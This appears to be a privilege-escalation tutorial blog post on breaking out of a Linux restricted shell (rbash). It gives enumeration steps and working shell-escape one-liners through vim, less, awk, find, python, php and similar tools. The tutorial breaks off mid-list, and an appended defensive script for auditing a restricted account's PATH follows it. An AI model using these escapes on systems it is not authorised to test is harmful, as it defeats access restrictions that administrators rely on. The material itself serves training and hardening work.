Advanced Techniques to Bypass Restricted shell | Privilege Escalation Tutorial


Mr Horbio

This article will help you bypass a restricted shell. Privilege escalation techniques help to bypass rbash.

Read the previous article first. I covered the basic techniques there.

Enumeration:

First, we need to enumerate the Linux environment to see what we can use to bypass rbash.

What information do we need to enumerate?

- Check for available commands such as cd, ls, echo, etc.
- Check for operators such as >, <, >>, \.
- Check for available programming languages such as perl, python, ruby, etc.
- Check which commands we can run here (sudo -l).
- Check SUID permissions.
- Check which shell you are using right now: echo $SHELL (mostly it is rbash).
- Check the environment variables: run env or printenv.

Common Exploitation Techniques:

- If "/" is allowed, you can run /bin/sh or /bin/bash.
- If you can run the cp command, copy /bin/sh or /bin/bash into your directory.
- From ftp > !/bin/sh or !/bin/bash
- From gdb > !/bin/sh or !/bin/bash
- From more/man/less > !/bin/sh or !/bin/bash
- From vim > !/bin/sh or !/bin/bash
- From rvim > python import os; os.system("/bin/bash")
- From scp > scp -S /path/yourscript x y:
- From awk > awk 'BEGIN {system("/bin/sh")}' (or "/bin/bash")
- From find > find / -name test -exec /bin/sh \; (or /bin/bash)

Programming Language Techniques:

- From expect > expect, spawn sh, then sh
- From python > python -c "import os;os.system('/bin/bash')"
- From php > php -a then exec("sh -i");
- perl > perl -e 'exec…
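Seen from the administrator's side, the two lists above reduce to one check: which of these tools can the restricted account reach, and can it write into its own PATH directories (the cp item)? The script below is an added example, not code from the original article; the function name `audit_rbash_path` and the demo directory are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the article: audit a restricted account's PATH.
# Tool names come from the article's lists; add versioned names (python3, ...)
# used on your systems.
ESCAPE_BINS="cp ftp gdb more man less vim rvim scp awk find expect python php perl"

# audit_rbash_path PATH_STRING (hypothetical helper)
#   PATH_STRING: colon-separated directories the restricted user can execute from.
#   Prints "ESCAPE <file>" for each listed tool found as an executable file and
#   "WRITABLE <dir>" for each directory the invoking user can write to.
#   Returns 1 if anything was reported, 0 otherwise.
audit_rbash_path() {
    _found=0
    _old_ifs=$IFS
    set -f                      # no globbing while we split on ':' and ' '
    IFS=:
    for _dir in $1; do
        IFS=$_old_ifs
        [ -d "$_dir" ] || continue
        if [ -w "$_dir" ]; then
            echo "WRITABLE $_dir"
            _found=1
        fi
        for _name in $ESCAPE_BINS; do
            if [ -f "$_dir/$_name" ] && [ -x "$_dir/$_name" ]; then
                echo "ESCAPE $_dir/$_name"
                _found=1
            fi
        done
    done
    IFS=$_old_ifs
    set +f
    return "$_found"
}

# Constructed demo input: a throwaway bin directory holding three fake tools.
demo=$(mktemp -d)
for tool in ls less awk; do
    printf '#!/bin/sh\n' > "$demo/$tool"
    chmod +x "$demo/$tool"
done
audit_rbash_path "$demo" || echo "findings above need review"
rm -rf "$demo"
```

Run it as the restricted account itself so the writability test reflects that account's rights; a clean result means an empty report and exit status 0.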